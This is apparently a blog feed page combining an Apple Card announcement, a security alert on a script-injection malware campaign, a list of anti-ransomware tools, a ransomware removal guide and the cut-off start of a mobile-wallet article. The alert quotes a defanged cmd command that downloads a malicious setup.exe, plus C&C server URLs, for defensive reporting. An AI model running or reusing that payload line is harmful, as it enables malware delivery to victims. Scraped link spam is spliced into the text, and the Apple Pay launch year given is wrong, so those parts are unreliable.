Apple Announces ‘Apple Card’ Credit Card With Daily Rewards, Simplified Statements, and No Fees

Apple revealed a brand new service called “Apple Card,” a new digital and physical credit card that users will be able to sign up for right from their iPhone. Apple says this sign-up process takes just a few minutes and then they can start using the Apple Card right away in stores, in apps, or online worldwide. Apple partnered with Goldman Sachs and Mastercard for Apple Card.

After spending, Apple Card will give users simple real-time views of their latest transactions and balance in the Wallet app. Apple Card uses machine learning and Apple Maps to label transactions with merchant names and locations. Purchases are then automatically totaled and color coded through categories like Food and Drinks, Shopping and Entertainment, and more. 

At the end of each week and month, the Wallet app will show what users spent to help visualize their past finances. The company will also provide 24/7 customer support through Messages. 

Anyone who uses Apple Card will receive a percentage of every purchase amount back as “Daily Cash,” the card’s rewards program. Every time users pay with Apple Card they will receive 2 percent Daily Cash back, and if they make a purchase directly with Apple they’ll get 3 percent Daily Cash back. Daily Cash is immediately added to the user’s Apple Cash card in the Wallet app, and can be used anywhere Apple Pay is accepted. 

Apple Card has no fees associated with it, and the company says that “Apple Card’s goal is to provide interest rates that are among the lowest in the industry and if a customer misses a payment, they will not be charged a penalty rate.” 

As with Apple’s other services, the company promises that Apple Card is completely secure and private. 

A unique card number is created on iPhone for Apple Card and stored safely in the device’s Secure Element, a special security chip used by Apple Pay. Every purchase is secure because it is authorized with Face ID or Touch ID and a one-time unique dynamic security code. The unique security and privacy architecture created for Apple Card means Apple doesn’t know where a customer shopped, what they bought or how much they paid.

There will also be a physical Apple Card for shopping at locations where Apple Pay is not accepted. The card is made out of titanium, has no card number, no CVV, no expiration date, and requires no signature. 

Apple Card launches in the United States this summer.

Read More

Security Alert: Malware Hides in Script Injection, Bypassing AV Detection

In which delivers RAT to infect various blogs and websites

We all know that cybercriminals never cease to look out for creative methods to launch (more) targeted attacks with a smaller infrastructure to carry out, giving them easy access to users’ most valuable data.

Security researchers recently observed and analyzed various spam campaigns in which online criminals were trying to infect multiple commercial blogs and insecure Content Management Systems (CMS).

How the infection spreads (technical details explained)

In the analyzed spam campaigns, the attackers are baiting victims by trying to inject malicious scripts with the main purpose to run the following payload (sanitized for your own safety) on users’ machines:

cmd / c cd% Public% & @ echo AmmEiqWkls = “” https: //gullgas.weebly [.] com / uploads / 1/2/3/0/123060154 / setup.exe”

This particular “setup.exe” is a malicious file which is hidden in the Nullsoft Scriptable Install System (NSIS) package. This technique isn’t new, because we have seen it in previous spam campaigns, but it’s notable how malicious actors improve the way they “pack” malicious code to deliver malware.

If the executable file is dropped on the infected machines, cybercriminals can collect sensitive information, such as IP address, MAC address, manufacturer details, country name, Name and ID of the Operation System, CPUID or Hard Disk serial number. These data are stored in a Javascript object which is converted into JSON and then added in text strings.

Once attackers can remotely access the victim’s’ Windows machine, they will install the malicious executable file as follows:

msiexec.exe in C: Documents and Settings [user account] Local Settings Application Data Downloaded Installations {374BE032-0D10-4FAE-9C8E-BAC1B936896F} Setup12.msi “SETUPEXEDIR =” C: “SETUPEXENAME

All the data is then protected using this “UnqiueKeyGenerate.Encrypt (name)” function.

In the next step, the backdoor is copied to C: ProgramData in Windows Update folder, and then tries to check for an Internet connection to connect to the following C&C servers (sanitized for your own protection): http: //18.218.2 [.] 135 / service1.svc / applyingpoliciesrules / http: //18.218.2 [.] 135 / service1.svc / getInfoAfterInstall

After that, all data is accessed through these C&C servers, and the communication process is encrypted with a special key.

The main target of this type of attack is to exfiltrate data from compromised systems and to open a backdoor which allows online criminals to feed more malware into the targeted machines.

Heimdal Security proactively blocked these infected domains, so all Thor Home and Thor Enterprise users are protected.

According to VirusTotal, NO antivirus product out of 68 products has managed to detect this .exe file as malicious at the time we write this security alert.

Apply these basic security measures to protect yourself against malicious script injections

The main issue with this particular type of malware is that it went undetected by traditional antivirus products. By injecting a malicious script, hackers can redirect users to compromised sites/ servers and steal users’ most sensitive data.

This is why we strongly recommend our users to:

  • Keep the operating system and all apps and software programs fully patched, with the newest updates available.
  • Be very careful when clicking on suspicious links or websites and always check if the web page’s URL is genuine;
  • Make sure you access only sites that have a security certificate or HTTPS to avoid malware infection;
  • Consider using a proactive cybersecurity software solution to enhance online protection;
  • Prevention is always the best cure, so we strongly recommend checking out these actionable andfree educational resources to gain more knowledge in the cybersecurity industry, and better spot online threats.
Read More

8 Free Anti-Ransomware Tools To Remove And Prevent CryptoLocker Virus

How to remove a WannaCry ransomware? All victims have to do is download WanaKiwi tool from Github and run it on their affected Windows computer using the command line (cmd). Ransomware is as scary as it sounds. Hackers use this technique to lock you out of your devices and demand a ransom in return for access.

Ransomware puts you in a sticky situation, so it’s best to know how to avoid it. Ransomware is a specific type of malicious software that has been designed to force users to pay the ransom — usually in the form of Bitcoin — by encrypting data or locking the screen. There are ways users can protect their data against ransomware attacks. This begins with the right security software but does not end there. Regular, offsite backups with the external hard disk not connected to the computer are probably the better prevention.

Free Anti-Ransomware Tools To Remove And Prevent CryptoLocker Virus

Hundreds if not thousands of ransomware families now dominate the playing field, infecting both Microsoft Windows and Apple macOSX. But they’re not all created equal, here are 10 strains that made some of the biggest waves in 2016. The Top 10 Ransomware Strains of 2016 / 2017 are – CryptoWall, SamSam, Jigsaw, Chimera, Petya and Mischa, Cerber, CryLocker, HDDCryptor, TeslaCrypt and Locky.

↓ 01 – Bitdefender Anti-Ransomware Tool

Bitdefender Anti-Ransomware Tool

Bitdefender Anti-Ransomware is a free security tool that can protect against existing and emerging ransomware attacks. Ransomware is a category of malicious software designed to block access to your computer and files until you pay a large sum of money. Download our advanced ransomware vaccine right now to stay safe from losing your money or files. Bitdefender Anti-Ransomware is a free security tool that offers next-gen protection against the CTB-Locker, Locky, Petya, and TeslaCrypt ransomware families by keeping your files safe from encryption in a simple and non-intrusive way. Works great on Microsoft’s Windows 10 and Apple’s macOS.

  • Completely free for download and use
  • Next-gen ransomware protection against CTB-Locker, Locky, Petya and TeslaCrypt ransomware families
  • Keeps your files safe from encryption
  • Non-intrusive and easy to use

↓ 02 – Malwarebytes Anti-Ransomware

Malwarebytes Anti-Ransomware

Malwarebytes Anti-Ransomware uses advanced proactive technology that monitors what ransomware is doing and stops it cold before it even touches your files. It has no shot at encrypting. And it does not rely on signatures or heuristics, so it’s light and completely compatible with antivirus.Maybe This Is The Article? :  FREE Panda Cloud Antivirus Pro With 180 Days Activation

These methods proved to be so successful at stopping ransomware that Malwarebytes Anti-Ransomware detected all of the latest and most dangerous ransomware variants right out of development and into beta 1. This means when running Malwarebytes Anti-Ransomware, you do not have to worry about getting infected by CryptoLocker, CryptoWall, or CTBLocker. Better yet, it can defeat new ransomware the moment it is released, proactively protecting you from ransomware that’s never even been seen before.

↓ 03 – CryptoPrevent

CryptoPrevent

CryptoPrevent is a robust anti-virus/anti-malware software supplement, filling a huge gap that exists with traditional security solutions to provide protection against a growing multitude of new and emerging ransomware and other malicious software threats. CryptoPrevent Malware Prevention is the original CryptoLocker prevention tool you’ve read about, designed to prevent infection from the first “ransomware” threat which emerged in late 2013, encrypting valuable data on the infected PC and offering decryption in exchange for large payment.

  • Folder Watch – Monitors and protects common folders from items that match malware definitions.
  • Submit Malicious Files – This will allow you to submit malicious files (which are not in our malware definitions) to review for inclusion in the default definitions.
  • HoneyPot Ransomware Protection – Very effective in preventing new and unknown ransomware from encrypting your files! When malicious activity is detected ALL non-essential programs are terminated, stopping malicious software dead in it’s tracks.
  • KillEmAll v5 Integrations – Based on the new code platform of the coming 3rd generation ‘d7x’ PC technician utilities, KillEmAll v5 allows for fast termination of non-essential programs including malware and ransomware, and is integrated into the new Tray Icon along with other useful features!

↓ 04 – Trend Micro Ransomware Screen Unlocker

Trend Micro Ransomware Screen Unlocker

Ransomware is a type of malware that prevents or limits users from accessing their system. This type of malware forces its victims to pay the ransom through certain methods in order to grant access to their systems, or to get their data back. There are two types of Ransomware: Lock Screen which limits the users from accessing the computer and Crypto (File Encryption) which encrypts files to limit users from access their files. Trend Micro™ Ransomware Screen Unlocker Tool is designed to eliminate Lock Screen ransomware from your infected PC.

↓ 05 – RansomFree by Cybereason

RansomFree by Cybereason

RansomFree is a free software by Cybereason for detection and blocking of 99% of ransomware types. By putting multiple deception methods in place, RansomFree detects ransomware as soon as encryption occurs either on a computer or network drive. Once encryption is detected, RansomFree suspends it, displays a popup that warns users their files are at risk and enables them to stop the attack.Maybe This Is The Article? :  Download FREE ESET NOD32 Antivirus And Internet Security With 60-Days Free

↓ 06 – GridinSoft Anti-Ransomware

GridinSoft Anti-Ransomware

Hackers and cybercriminals are developing new ways to infect computers. and they are more harmful than all viruses which you’ve seen before. Without any protection, your system is helpless against the modern cryptolockers. You can loose all important files unexpectedly. And GridinSoft Anti-Ransomware is absolutely free. So what are you waiting for? Get this awesome tool and protect your PC from cryptor threats. GridinSoft Anti-Ransomware works as a vaccine for computer. When protection is enabled, the ransomware bypasses your computer.

↓ 07 – Kaspersky Anti-Ransomware Tool

Kaspersky Anti-Ransomware Tool

Companies of all sizes are being targeted by cybercriminals, who encrypt and hold their data ‘hostage’ until a ransom is paid. Cybercriminals don’t sit still, they’re always developing new techniques and tools to hold businesses and their data to ransom. Kaspersky Anti-Ransomware Tool for Business offers complimentary security to protect corporate users from ransomware, It identifies ransomware behavior patterns and protects Windows-based endpoints effectively.

↓ 08 – NeuShield Data Sentinel Free

NeuShield Data Sentinel Free

Traditional ransomware protection is able to detect and block known malware and viruses. Even with constant updates, however, it’s often not effective in stopping new or unknown attacks. NeuShield Data Sentinel’s patent pending Mirror Shielding™ technology adds a layer of protection to your existing antivirus software, allowing you to instantly recover critical files from any ransomware attack without a backup.

  • Mirror Shielding – Protects data against ransomware, targeted, zero-day, and unknown threats attempting to encrypt or lock your files
  • Boot Protection – Prevents ransomware from making your system unable to boot
  • Disk Wipe Protection – Blocks wipers from removing or destroying all data on your hard drive
  • My Documents and Desktop Folder Protection – Protects files in the My Documents and desktop folders
Read More

What ransomware is and how to prevent and remove it

Ransomware is a particularly invasive form of malware that typically takes over a victim’s data or device and holds it hostage until a sum of money is handed over to secure its release.

Ransomware essentially involves digital extortion where malware holds files or computer systems hostage until the victim pays a fee. Ransomware is popular with an increasing number of cybercriminals, likely due to its ease of implementation and high return on investment. Add to this the advent of cryptocurrency, which has made it easier for attackers to get away with their crimes. According to Daniel Tobok, CEO of Cytelligence Inc., a cybersecurity and ransomware removal company, “Ransomware is really the weapon of choice for a criminal. They can see us but we can’t see them.”

Ransomware can be costly for individuals, but can be especially harmful to businesses. It’s estimated that total damages to businesses in the United States due to ransomware totalled $5 billion in 2017 alone. Damages may include costs involved in paying ransoms, losing data, paying professional services to try to recover data, downtime during attacks, loss of customers after attacks, and more.

The best way to reduce the threat of ransomware is to prevent it being installed in the first place. But if you do fall victim, you have options. In this guide, we explain what ransomware is and how to prevent and remove it. We focus on practical methods that you can employ that emphasize removal over paying the ransom, which we strongly discourage.

What is ransomware and how does it work?

Part of taking the fear out of ransomware involves understanding how it actually works. As former UN Secretary-General Kofi Annan once said, “Knowledge is power. Information is liberating.”

Ransomware is similar to some other forms of malware, with an added bit of extortion. Ransomware is a category of malware, but there are also different types of ransomware. It penetrates computer systems in the same manner as other forms of malware. For example, you might:

  • Download it from a malicious email attachment or link
  • Load it onto your machine from a USB flash drive or DVD
  • Download it while visiting a corrupted website

Once it’s on your system, the ransomware shuts down select system functions or denies access to files. In the case of Windows machines, it usually disables your ability to access the start menu (that way you can’t access antivirus programs or try to revert to Safe Mode).

A staple of many types of ransomware is encryption. The ransomware encrypts files on your device so they cannot be opened without a password. To get the password, you must pay a ransom to the attacker.

Any file can be encrypted with ransomware, although most ransomware won’t attempt to encrypt all types of files. Common targets include image files, PDFs, and any type of file created by Microsoft Office (such as Excel and Word files). The common method ransomware will use is to search for files on common drives and encrypt any or most files it finds there. Some newer forms of encrypting ransomware have even taken to encrypting network shared files as well, a dangerous development for businesses in particular.

Until you clear the virus from your machine (or pay the demanded ransom and hope the criminal clears it for you), you won’t have access to those files. Some ransomware will even demand that you pay up within a certain amount of time, or else the files will stay locked forever or the virus will completely wipe your hard drive.

Related: How to start Windows 7/8/10 in safe mode

Why is ransomware so effective?

Whichever method the program uses to penetrate your system, ransomware is designed to hide itself by pretending to be something it’s not, even changing file names or paths to make your computer and antivirus software overlook suspicious files. The key difference between ransomware and other forms of malware is that the purpose of ransomware extends beyond just mischief or stealthily stealing personal information.

If anything, ransomware acts more like a bull in a china shop once it has effectively found its way onto your system. Unlike many other viruses, which are often designed around stealth both before and after invading your system, ransomware designers want you to know the program is there.

After the program is installed, it completely takes over your system in such a way that you’ll be forced to pay attention to it. It’s a very different modus operandi than virus designers have traditionally followed, and it appears to be the most effective money-making virus design to date.

Ransomware works through fear, intimidation, shame, and guilt. Once the program is there, it begins a negative campaign of emotional manipulation to get you to pay the ransom. Far too often those fear tactics work, especially on individuals who don’t realize that there are alternatives to paying up.

According to a 2016 Malwarebytes survey of large businesses affected by ransomware, 40 percent of victims paid the ransom, while an IBM survey of small- to medium- sized businesses in the same year reported a much higher rate of 70 percent.

Types of ransomware

Ransomware has been around since the 1980s, but many attacks today use ransomware based on the more modern Cryptolocker trojan. File-encrypting ransomware is increasingly the most common type. However, according to Malwarebytes, there are several categories of ransomware that you may still encounter:

Encrypting ransomware

Cryptolocker


If ransomware finds its way onto your machine, it’s likely going to be of the encrypting variety. Encrypting ransomware is quickly becoming the most common type due to a high return on investment for the cybercriminals using it, and how difficult it is to crack the encryption or remove the malware.

Encrypting ransomware will completely encrypt the files on your system and disallow you access until you’ve paid a ransom, typically in the form of Bitcoin. Some of these programs are also time-sensitive and will start deleting files until the ransom is paid, increasing the sense of urgency to pay up.

On this type of ransomware, Adam Kujawa, Head of Intelligence at Malwarebytes, had this to say: “It’s too late once you get infected. Game over.”

Online backup can be a great help in recovering encrypted files. Most online backup services include versioning so you can access previous versions of files and not the encrypted ones

Scareware

Scareware
Source: College of St. Scholastica

Scareware is malware that attempts to persuade you that you have a computer virus that needs removal right away. It will then try to get you to clear the virus by buying a suspicious and typically fake malware or virus removal program. Scareware is highly uncommon these days, but some of these viruses do still exist out in the wild. Many target mobile phones.

Scareware doesn’t encrypt files, although it may attempt to block your access to some programs (such as virus scanners and removers). Nevertheless, scareware is the easiest to get rid of. In fact, in most cases, you can remove scareware using standard virus removal programs or other methods without even entering Safe Mode (although this may still be necessary or recommended).

Screen locker (or lock-screen viruses)

screen locker

Screen lockers will put up a warning screen that limits your ability to access computer functions and files. These can be installed onto your machine or exist within a web browser. They’ll typically come with a message claiming to represent a law enforcement organization and carry a message saying you’ll face severe legal consequences if you do not pay a fine immediately.

You might end up downloading a lock-screen virus via a number of different ways, including visiting compromised websites or by clicking on and downloading an infected file contained in an email. When installed directly onto a computer, you may have to perform a hard reboot, although you may also find that you’re still greeted with the screen lock message even when the operating system loads up again.

Screen lockers tend to lock you out of your menu and other system settings, but don’t completely remove access to your files. This means some of the malware’s primary attack methods prevent you from easily accessing your virus removal software, and at times may even prevent you from restarting your computer from the user interface.

Screen lockers are another good reason why having online backup is extremely important. While the screen locker won’t encrypt or delete your files, you may find yourself forced to perform a system restore. The system restore may not delete your important files, but it will return them to an earlier state. Depending on the restored states, that may still result in a lot of lost data or progress. Regular online backups will help prevent data loss that performing a system restore does not guarantee, especially if the virus has been hiding on your system for much longer than you realized.

How to prevent ransomware

Decrypting files encrypted with ransomware is incredibly difficult. Most ransomware these days will use AES or RSA encryption methods, both of which can be incredibly difficult to crack. To put it in perspective, the US government also uses AES encryption standards for classified documents. Information on how to create this kind of encryption is widely known, as is the difficulty in cracking it. Until someone realizes the dream of quantum computing, brute-force cracking for AES is effectively impossible.

This being the case, the best method to fight ransomware is never allowing it to get onto your system in the first place. Protection can be accomplished by shoring up weak areas and changing behaviors that typically allow ransomware to get onto your system. Here are some best practices to follow to prevent ransomware:

  • Invest in solid data backup. This is hard to understate. Data backup is the single best thing you can do. Even if you do get hit by ransomware, having effective and consistent data backup means your data will be safe, regardless of which type of ransomware you’re attacked with.
  • Invest in effective antivirus software. In this case, you don’t just want malware or virus cleaners, but software that will actively monitor and alert you to threats, including inside web browsers. That way, you’ll get notifications for suspicious links, or get redirected away from malicious websites where ransomware may be housed.
  • Never click on suspicious email links. Most ransomware spreads through email. When you make it a habit of never clicking on suspicious links, you significantly lower your risk of downloading ransomware and other viruses.
  • Protect network-connected computers. Some ransomware works by actively scanning networks and accessing any connected computers that allow remote access. Make sure any computers on your network have remote access disabled or utilize strong protection methods to avoid easy access.
  • Keep software up to date. Updates to Windows and other operating systems and applications often patch known security vulnerabilities. Updating in a timely manner can help lower the risk of susceptibility to malware, including ransomware.

What to do if you catch ransomware mid-encryption

Encryption is a resource-intensive process that consumes a lot of computational power. If you’re lucky, you may be able to catch ransomware mid-encryption. This takes a keen eye and knowing what unusually large amounts of activity look and sound like on your computer. Ransomware encryption will happen in the background, so it’s almost impossible to detect this actually occurring unless you’re specifically looking for it.

Additionally, the virus doing the encryption will likely be hiding inside another program, or have an altered file name that is made to look innocuous, so you might not be able to tell which program is performing the action. However, should you discover what you think is a ransomware virus encrypting files, here are a couple of options:

Place your computer into hibernation

This will stop any running processes and create a quick memory image of your computer and files. Do not restart your computer or take it out of hibernation. In this mode, a computer specialist (either from your IT department or a hired security company) can mount the device to another computer in a read-only mode and assess the situation. That includes the recovery of unencrypted files.

Suspend the encryption operation

If you can identify which operation is the culprit, you may want to suspend that operation.

In Windows, this involves opening up the Task Manager and looking for suspicious operations. In particular, look for operations that appear to be doing a lot of writing to the disk.

You can suspend operations from there. It’s better to suspend the operation instead of killing it, as this allows you to investigate the process in more detail to see what it’s actually up to. That way you can better determine whether you have ransomware on your hands.

If you do find that it’s ransomware, check which files the process has been focusing on. You may find it in the process of encrypting certain files. You can copy these files before the encryption process has finished and move them to a secure location.

You can find some other great suggestions by security and computer professionals on Stack Exchange.

Ransomware removal: How to remove scareware and screen lockers (lock-screen viruses)

Screen lockers are more troublesome to remove than scareware, but are not as much of a problem as file-encrypting ransomware. Scareware and lock-screen viruses are not perfect and can often be easily removed at little to no cost. You have two main options:

  1. Perform a full system scan using a reputable on-demand malware cleaner
  2. Perform a system restore to a point before the scareware or screen locker began popping up messages.

Let’s look at both of these in detail:

Option 1: Perform a full system scan

This is a fairly simple process, but before performing a system scan, it’s important to choose a reputable on-demand malware cleaner. One such cleaner is Zemana Anti-Malware, or Windows users could even use the built-in Windows Defender tool.

To perform the full system scan using Zemana Anti-Malware, do the following:

  • Open your Zemana Anti-Malware home screen.
  • Click on the Gear Symbol on the top right to access settings.
  • Click on Scan on the left.
zemana
  • Select Create Restore Point.
  • Return to the home screen and click on the green Scan button on the bottom right.
zemana

Setting the restore point is a good best practice for virus scans in general. Meanwhile, your virus scan might tag some things as problems that aren’t problems (Chrome extensions often come up as problematic, for example), while you could find areas of concern that you weren’t expecting.

In my case, a recent Zemana system scan revealed a potential DNS hijack. Yikes! (It also misclassified a few programs as malware and adware, so be careful make sure to check which files you’re cleaning and quarantining properly.)

zemana

To perform a full system scan using Windows Defender, do the following:

  • Perform a quick system search for “Windows Defender.”
  • Access Windows Defender and select Full on the right side.
  • Click on Scan.

Microsoft continually improves its built-in Windows antivirus software, but it’s not as good a solution as an on-demand option like Zemana or many other high-quality programs. You could choose to run two programs to cover your bases, but note that they can’t be run concurrently.

When dealing with screen-locking ransomware, you may need to enter Safe Modeto get the on-demand virus removers to work or to run your system restore properly. Even some scareware can at times prevent you from opening your virus removal programs, but they usually can’t prevent you from doing so while you’re in Safe Mode. If you’re having trouble getting your computer to restart in Safe Mode (a distinct possibility if you have a screen locker), check out our guide on How to Start Windows in Safe Mode.

Option 2: Perform a system restore

Another option is to perform a system restore to a point before the scareware or screen locker began popping up messages. Note that this option assumes that you have your computer set to create system restore points at preset intervals, or that you’ve performed this action yourself manually. If you’re accessing this guide as a preventative measure against ransomware, creating restore points from this point forward will be a good idea.

Here’s how to find your restore points or set new restore points in Windows:

  • Access your Control Panel (you can do this through a system search for “Control Panel”).
system restore
  • Click on System and Security.
  • Click on System.
  • Go to Advanced system settings.
system restore
  • Click on the System Protection tab and select System Restore.
system restore
  • If you have never run a system backup, click on Set up backup. This will open up the backup operations and get you started. Once there, you’ll need to pick your backup location, the files you want to be backed up (or you can let Windows select those for you), schedule when you want your backups to occur, and then perform the backup.
system restore
  • If it shows that you already have a backup in place, select the backup files from the most recent restore point or from whichever restore point you desire.
system restore

The backup restoration process may take several minutes, especially if the amount of data being restored is significant. However, this should restore your file system to a point before the virus was downloaded and installed.

Note that both a scan and a restore can have delayed reaction times, so it’s a good idea to do both.

Indiana University also provides a helpful knowledge base with a few advanced methods for more troublesome scareware. We also recommend checking out ourComplete Guide to Windows Malware and Prevention. It will walk you through the process of malware removal and what that process looks like with several different programs.

Ransomware removal: How to remove file encrypting ransomware

Once encrypted ransomware gets onto your system, you’re in trouble if you want to keep any unsaved data or anything that hasn’t been backed up (at least without paying through the nose for it). Surprisingly, many cyber criminals are fairly honorable when it comes to releasing the encryption after they’ve received payment. After all, if they never did, people wouldn’t pay the ransom. Still, there is a chance that you could pay the ransom and find your files never released, or have the criminals ask for more money.

That being said, if you’re hit with a nasty piece of encrypting ransomware, don’t panic. Alongside that, do not pay the ransom. You have two alternative options for ransomware removal:

  • Hire a professional ransomware removal service: If you have the budget to hire a professional and deem recovering your files worth the money, then this might be the best course of action. Many companies, including Proven Data Recovery and Cytelligence specialize in providing ransomware removal services. Note that some charge even if the removal is unsuccessful, while others don’t.
  • Try to remove the ransomware yourself: This is typically free to do and may be a better option if you don’t have the funds to hire a professional. Recovering your files yourself will typically involve first removing the malware and then using a tool to decrypt your files.

If you’d like to try resolve the issue yourself, here are the steps to take:

Step 1: Run an antivirus or malware remover to get rid of the encryption virus

Refer back to the malware/virus removal instructions provided in the scareware/screen locker removal section above. The removal process in this step will be the same, with one exception: WE STRONGLY ENCOURAGE YOU TO REMOVE THIS VIRUS IN SAFE MODE WITHOUT NETWORKING.

There is a chance that the file-encrypting ransomware you’ve contracted has also compromised your network connection, so it’s best to cut off the hackers’ access to the data feed when removing the virus. Note that this may not be wise if you’re dealing with a few variants of the WannaCry ransomware, which check against a gibberish website to identify a potential killswitch. If those sites are registered (which they are now), the ransomware halts encryption. This situation is highly uncommon, however.

Removing the malware is an important first step to deal with this problem. Many reliable programs will work in this case, but not every antivirus program is designed to remove the type of malware that encrypts files. You can verify the effectiveness of the malware removal program by searching its website or contacting customer support.

The real problem you will find is that your files will stay encrypted even after you remove the virus. However, trying to decrypt files without removing the malware first may result in the files getting re-encrypted.

Step 2: Try to decrypt your files using a free ransomware decryption tool

Again, you should be doing everything you can to avoid paying a ransom. Your next step is going to be to try a ransomware decryption tool. Note, however, that there is no guarantee that there will be a ransomware decryption tool that will work with your specific malware. This is because you may have a variant that has yet to be cracked.

Kaspersky Labs and several other security companies operate a website called No More Ransom! where anyone can download and install ransomware decryptors.

nomoreransom

Kaspersky also offers free ransomware decryptors on its website.

First, we suggest you use the No More Ransom Crypto Sheriff tool to assess what type of ransomware you have and whether a decryptor currently exists to help decrypt your files. It works like this:

  • Select and upload two encrypted files from your PC.
  • Provide a website or email address given in the ransom demand, for example, where the ransomware is directing you to go to pay the ransom.
  • If no email address or website is given, upload the .txt or .html file with the ransom note.
The Crypto Sheriff.

The Crypto Sheriff will process that information against its database to determine if a solution exists. If no suggestion is offered, don’t give up just yet, however. One of the decryptors may still work, although you might have to download each and every one. This will be an admittedly slow and arduous process, but could be worth to see those files decrypted.

The full suite of decryption tools can be found under the Decryption Tools tab on the No More Ransom! website.

Running the file decryptors is actually pretty easy. Most of the decryptors come with a how-to guide from the tool’s developer (most are from EmsiSoft, Kaspersky Labs, Check Point, or Trend Micro). Each process may be slightly different, so you’ll want to read the PDF how-to guide for each one where available.

Here’s an example of the process you’d take to decrypt the Philadelphia ransomware:

  • Choose one encrypted file on your system and a version of that file that’s currently unencrypted (from a backup). Place these two files in their own folder on your computer.
  • Download the Philadelphia decryptor and move the executable to the same folder as your paired files.
  • Select the file pair and then drag and drop the files onto the decryptor executable. The decryptor will then begin to determine the correct keys needed to decrypt the file.
  • This process may take quite a lot of time, depending on the complexity of the program
Philadelphia decryptor
  • Once completed, you will receive the decryption key for all files encrypted by the ransomware.
Philadelphia decryptor
  • The decryptor will then ask you to accept a license agreement and provide you the options for which drives to decrypt files from. You can change the location depending on where the files are currently housed, as well as some other options that may be necessary, depending on the type of ransomware. One of those options usually includes the ability to keep the encrypted files.
  • You will get a message in the decryptor UI once the files have been decrypted.

Again, this process may not work, as you may have ransomware for which no decryptor is available. Many individuals who do get infected simply pay the ransom without looking into removal methods, so many of these ransomware are still used, despite having been cracked.

Backup option: Wipe your system and perform a complete data restoration from a data backup

Steps 1 and 2 only work when used together. If either fails to work for you, you’ll need to follow this step. Hopefully, you have a solid and reliable data backup already in place. If so, don’t give in to the temptation to pay the ransom. Instead, either personally or have an IT professional (preferably this option) wipe your system and restore your files through your online or physical backup system.

This is also a reason why bare-metal backup and restoration is important. There’s a good chance your IT professional may need to perform the complete bare-metal restoration for you. This not only includes your personal files, but your operating system, settings, and programs as well. Windows users may also need to consider a complete system reset to factory settings. Microsoft provides an explanation for multiple system and file restoration methods and options.

The history of ransomware

As mentioned, ransomware is not a new concept and has been around for many years. While the timeline below is not an exhaustive list of ransomware, it gives you a good idea of how this form of attack has evolved over time.

1989 – “Aids” Trojan, aka PC Cyborg, becomes the first known case of ransomware on any computerised system.

2006 – After a decade-busting hiatus, ransomware returns en masse with the emergence of Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip, and MayArchive. All are notable for their use of sophisticated RSA encryption algorithms.

2008 – Gpcode.AK arrives on the scene. Utilising 1024-bit RSA keys, it requires a massive effort, beyond the means of most users, to break.

2010 – WinLock hits users in Russia, peppering displays with porn until the user makes a $10 call to a premium rate number.

2011 – An unnamed Trojan locks up Windows machines, directing visitors to a fake set of phone numbers through which they can reactivate their operating systems.

2012 – Reveton informs users their machine has been used to download copyright material or child pornography and demands payment of a ‘fine.’

2013 – The arrival of the now infamous CryptoLocker. Ramping up the encryption level, it is incredibly hard to circumvent.

2013 – Locker turns up, demanding payment of $150 to a virtual credit card.

2013 – Hard to detect, CryptoLocker 2.0 adds the use of Tor for added anonymity for the criminal coder who created it.

2013 – Cryptorbit also adds Tor use to its repertoire and encodes the first 1.024 bits of every file. It also uses installs a Bitcoin miner to milk victims for extra profit.

2014 – CTB-Locker mainly targets Russia-based machines.

2014 – Another significant development, CryptoWall infects machines via infected website advertisements and manages to affect billions of files worldwide.

2014 – A somewhat more friendly piece of ransomware, Cryptoblocker avoids Windows files and targets files under 100 MB in size.

2014 – SynoLocker targets Synology NAS devices, encrypting every file it finds on them.

2014 – TorrentLocker utilizes spam emails to spread, with different geographic regions targeted at a time. It also copies email addresses from the affected users’ address book and spams itself out to those parties as well.

2015 – Another hard-to-detect piece of ransomware, CryptoWall 2.0 uses Tor for anonymity and arrives in a manner of different ways.

2015 – TeslaCrypt and VaultCrypt can be described as niche ransomware in that they target specific games.

2015 – CryptoWall 3.0 improves on its predecessor by coming packaged in exploit kits.

2015 – CryptoWall 4.0 adds another layer to its encryption by scrambling the names of the encrypted files.

2015 – The next level of ransomware sees Chimera not only encrypt files but also publish them online when ransoms are not paid.

2016 – Locky arrives on the scene, named primarily because it renames all your important files so they have a .locky extension.

2016 – Located on BitTorrent, KeRanger is the first known ransomware that is fully functional on Mac OS X.

2016 – Named for the Bond villain in Casino Royale who kidnaps bond’s love interest to extort money, LeChiffre program takes advantage of poorly-secured remote computers on accessible networks. It then logs in and runs manually on those systems.

2016 – Jigsaw will encrypt and then delete files progressively until the ransom is paid. After 72 hours, all files will be deleted.

2016 – SamSam ransomware arrives complete with a live chat feature to help victims with their ransom payment.

2016 – The Petya ransomware utilizes the popularity of cloud file sharing services by distributing itself through Dropbox.

2016 – The first ransomware worm arrives in the form of ZCryptor, which also infects external hard drives and flash drives attached to the machine.

2017 – Crysis targets fixed, removable, and network drives, and uses powerful encryption methods that are difficult to crack with today’s computing capabilities.

2017 – WannaCry is spread through phishing emails and over networked systems. Uniquely, WannaCry uses a stolen NSA backdoor to infect systems, as well as another vulnerability in Windows that was patched over a month before the release of the malware (more details below).

WannaCry ransomware

The WannaCry ransomware is probably the most infamous in recent years, mainly due to the shear number of computers it affected. It quickly became the fastest-spreading ransomware in the history of ransomware, affecting 400,000 machines in its wake. Generally speaking, WannaCry is not particularly unique, so much that it has infected some very big names and important government agencies across the world, and used a stolen National Security Agency (NSA) exploit tool to do it.

The stolen NSA tool is part of the reason WannaCry was so successful in spreading. Compounding the issue is the fact that many agencies and businesses were slow to roll out the proper Windows patch that would have prevented this exploit in the first place. Microsoft pushed that patch in mid-March 2017 but WannaCry didn’t start infecting systems until May.

Interestingly, the first variant of WannaCry was thwarted by a cyber security researcher and blogger who, while reading the code, discovered a kill switch written into the malware. WannaCry’s first variant checks to see if a certain website exists or not, the result determining whether or not it continues.

The security blogger decided to go ahead and register the site for around $10, which significantly slowed the spread of the virus. However, WannaCry’s creators were quick to roll out new variants (one of which had another website kill switch that was soon used to stop that variant).

In total, it’s estimated that WannaCry netted its creators around $140,000 worth of bitcoin. While this is no small sum, it’s nowhere near the estimated $325 million earned by those behind the Cryptowall Version 3 ransomware in 2015. This may be due to better education on ransomware or failings in the virus, but with the number of users affected, it seems things could have been worse.

Read More

Mobile Wallets – Still Not Living Up to Expectations


Ever since the birth of Apple Pay in 2012, payment experts have declared that we are living in “the year of the mobile wallet.” But digital wallet adoption rates have remained static for years. While a small group of consumers have embraced this new technology, many Americans seem perfectly happy continuing to use cards and cash for their purchases.

A Slow Start for Wallets

